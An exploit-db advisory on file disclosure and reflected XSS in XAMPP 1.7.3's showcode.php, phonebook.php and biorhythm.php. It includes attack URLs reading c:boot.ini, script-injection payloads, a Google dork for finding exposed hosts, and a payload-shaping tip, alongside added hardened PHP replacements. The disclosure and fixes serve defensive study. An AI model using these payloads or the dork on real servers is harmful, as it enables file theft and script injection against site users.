XAMPP 1.7.3 – Multiple Vulnerabilities

  • Author: TheLeader
    Date: 2010-11-01
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/15370/
  • # _ ___________ 
    #(_)____ _ __/ __ \/ /_________/ /_/_/ |
    # / // __ \ | / / / / / //_/ _ \/ __// / / /
    #/ // / / / |/ / /_/ / ,< /__/ /_/ // / / / 
    # /_//_/ /_/|___/\____/_/|_|\___/\__,_// /_/_/
    # Live by the byte |_/_/
    #
    # Members:
    #
    # Pr0T3cT10n
    # -=M.o.B.=-
    # TheLeader
    # Sro
    # Debug
    #
    # Contact: inv0ked.israel@gmail.com
    #
    # -----------------------------------
    #
    # Exploit Title: XAMPP <= 1.7.3 multiple vulnerabilities
    # Date: 31/10/2010
    # Author: TheLeader
    # Software Link: http://www.apachefriends.org/en/xampp-windows.html
    # Affected Version: 1.7.3 and prior
    # Tested on Windows XP Hebrew, Service Pack 3
    # ISRAEL, NULLBYTE.ORG.IL
    #
    # -----------------------------------
     
    I. File disclosure
    
    XAMPP is vulnerable to a remote file disclosure attack.
    The vulnerability exists within the web application supplied with XAMPP.
    
    http://[host]/xampp/showcode.php/c:boot.ini?showcode=1
    
    showcode.php (the vulnerable script as shipped; the link in the first branch
    is shown as it appears in the file, built from PHP_SELF):
    <?php
     echo '<br><br>';
     if ($_REQUEST['showcode'] != 1) {
     // PHP_SELF, including any PATH_INFO the client appended, is written into
     // the href without escaping
     echo '<a href="'.$_SERVER['PHP_SELF'].'?showcode=1">'.$TEXT['global-showcode'].'</a>';
     } else {
     // basename() keeps only the last "/"-separated component of PHP_SELF and
     // that component, attacker-controlled via PATH_INFO, is read from disk
     $file = file_get_contents(basename($_SERVER['PHP_SELF']));
     echo "<h2>".$TEXT['global-sourcecode']."</h2>";
     echo "<textarea cols='100' rows='10'>";
     echo htmlspecialchars($file);
     echo "</textarea>";
     }
    ?>
    
    showcode.php relies on basename($_SERVER['PHP_SELF']) to decide which file to read.
    $_SERVER['PHP_SELF'] is the path of the requested script, but it also carries any PATH_INFO the client appends after the script name, so its trailing component is attacker-controlled.
    basename() returns the last component of that path, splitting on "/" (and, on Windows, also on "\").
    
    Traversing the directory tree would require the "/" character, which basename() consumes as a delimiter.
    Directory traversal is therefore not possible, but a drive-relative name such as c:boot.ini contains no separator, passes through basename() untouched and is handed straight to file_get_contents(). Files on any drive can be read this way, as can files in the directory showcode.php itself is served from (the xampp directory under htdocs).
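    The fix a practitioner would want is to stop deriving the file name from the request path at all. The following is an added example, not XAMPP's code: showcode.php rewritten to take the script from $_SERVER['SCRIPT_FILENAME'], the filesystem path the web server itself resolved (PATH_INFO is never part of it), with a realpath() containment check against __DIR__ (assumed to be htdocs/xampp) as a second guard. $TEXT is XAMPP's language array as used in the original; the helper name showcode_target is mine.

```php
<?php
// Added example, not the XAMPP source. Hardened replacement for showcode.php:
// the file to display comes from SCRIPT_FILENAME (server-resolved, no PATH_INFO),
// and must resolve to a .php file inside the assumed base directory __DIR__.

function showcode_target(array $server, string $baseDir): ?string
{
    // Prefer the path Apache mapped the request to. If it is missing (unusual
    // SAPI), fall back to a bare basename of SCRIPT_NAME joined to the base dir;
    // never accept a path from the client.
    $candidate = $server['SCRIPT_FILENAME'] ?? '';
    if ($candidate === '') {
        $candidate = $baseDir . DIRECTORY_SEPARATOR . basename($server['SCRIPT_NAME'] ?? '');
    }

    $real = realpath($candidate);
    $base = realpath($baseDir);
    if ($real === false || $base === false) {
        return null;            // nonexistent file or base directory
    }

    // Containment check: the resolved file must sit below the base directory.
    // Windows paths are case-insensitive, so compare accordingly there.
    $base .= DIRECTORY_SEPARATOR;
    $cmp = (DIRECTORY_SEPARATOR === '\\') ? 'strncasecmp' : 'strncmp';
    if ($cmp($real, $base, strlen($base)) !== 0) {
        return null;            // e.g. c:boot.ini or a symlink out of the tree
    }
    if (strtolower(pathinfo($real, PATHINFO_EXTENSION)) !== 'php') {
        return null;            // only ever show PHP sources
    }
    return $real;
}

echo '<br><br>';
if (($_REQUEST['showcode'] ?? '') != '1') {
    // Build the link from SCRIPT_NAME (which carries no PATH_INFO) and escape it.
    $self = htmlspecialchars($_SERVER['SCRIPT_NAME'], ENT_QUOTES, 'UTF-8');
    echo '<a href="' . $self . '?showcode=1">' . $TEXT['global-showcode'] . '</a>';
} else {
    $target = showcode_target($_SERVER, __DIR__);
    if ($target === null) {
        http_response_code(404);
        echo '<p>Source not available.</p>';
    } else {
        $file = file_get_contents($target);
        echo '<h2>' . $TEXT['global-sourcecode'] . '</h2>';
        echo "<textarea cols='100' rows='10'>";
        echo htmlspecialchars($file, ENT_QUOTES, 'UTF-8');
        echo '</textarea>';
    }
}
```

    When showcode.php is included by another page such as biorhythm.php, SCRIPT_FILENAME is the including script, so the "show source" feature keeps working; a request for showcode.php/c:boot.ini?showcode=1 now yields a 404 instead of the file, because the drive-relative name never reaches file_get_contents().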
    
    II. Cross Site Scripting
    
    http://[host]/xampp/phonebook.php/"><script>alert("XSS")</script>
    http://[host]/xampp/biorhythm.php/"><script>alert("XSS")</script>
    
    It is interesting to see the same programming error lead to a second vulnerability.
    Several PHP scripts in the xampp directory use $_SERVER['PHP_SELF'] to fill in the action attribute of their HTML forms.
    Because PHP_SELF includes the attacker-supplied PATH_INFO and the value is written into the attribute without htmlspecialchars(), this can be exploited for Cross Site Scripting.
    Where the sink wraps PHP_SELF in basename(), as biorhythm.php does, keep in mind that basename() cuts at the last "/": a payload containing a "/" (a closing </script> tag, for instance) is truncated to whatever follows that slash, while a payload with no slash in it, such as an event-handler attribute, reaches the attribute intact.
    
    biorhythm.php (line 75):
    <form method="post" action="<?php echo basename($_SERVER['PHP_SELF']); ?>">
    
    dork: "inurl:xampp/biorhythm.php"
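    The corresponding fix for the form action, as an added example rather than XAMPP's own code: take the name from $_SERVER['SCRIPT_NAME'], which stops at the script and carries no PATH_INFO, and HTML-escape it. The block also runs the vulnerable expression and the hardened one over a constructed $_SERVER array for a slash-free payload, so the difference is visible from the command line; the helper name form_action and the constructed request are assumptions of this example.

```php
<?php
// Added example, not the XAMPP source. PHP_SELF is SCRIPT_NAME plus PATH_INFO,
// so for the request  /xampp/biorhythm.php/"><svg onload=alert(1)>
// the PATH_INFO lands in the form action when PHP_SELF is echoed unescaped.

function form_action(array $server): string
{
    // SCRIPT_NAME never contains PATH_INFO; basename() drops the directory
    // part and htmlspecialchars() neutralises any quote or angle bracket that
    // could still arrive through a misconfigured server.
    $name = basename($server['SCRIPT_NAME'] ?? 'index.php');
    return htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
}

// Constructed request (not a real capture): a payload with no "/" in it, so
// basename() in the vulnerable expression leaves it intact.
$crafted = [
    'SCRIPT_NAME' => '/xampp/biorhythm.php',
    'PATH_INFO'   => '/"><svg onload=alert(1)>',
];
$crafted['PHP_SELF'] = $crafted['SCRIPT_NAME'] . $crafted['PATH_INFO'];

// Vulnerable expression from biorhythm.php line 75 versus the hardened helper.
$vulnerable = basename($crafted['PHP_SELF']);   // "><svg onload=alert(1)>  -> breaks out of the attribute
$hardened   = form_action($crafted);            // biorhythm.php

echo 'vulnerable: <form method="post" action="' . $vulnerable . '">' . PHP_EOL;
echo 'hardened:   <form method="post" action="' . $hardened . '">' . PHP_EOL;
?>
<!-- Replacement for the form tag on biorhythm.php line 75 -->
<form method="post" action="<?php echo form_action($_SERVER); ?>">
```

    Run with the php CLI the script prints the two action attributes side by side; in a real page only the final form tag is needed. The same substitution applies to showcode.php's link and to any other script that echoes PHP_SELF.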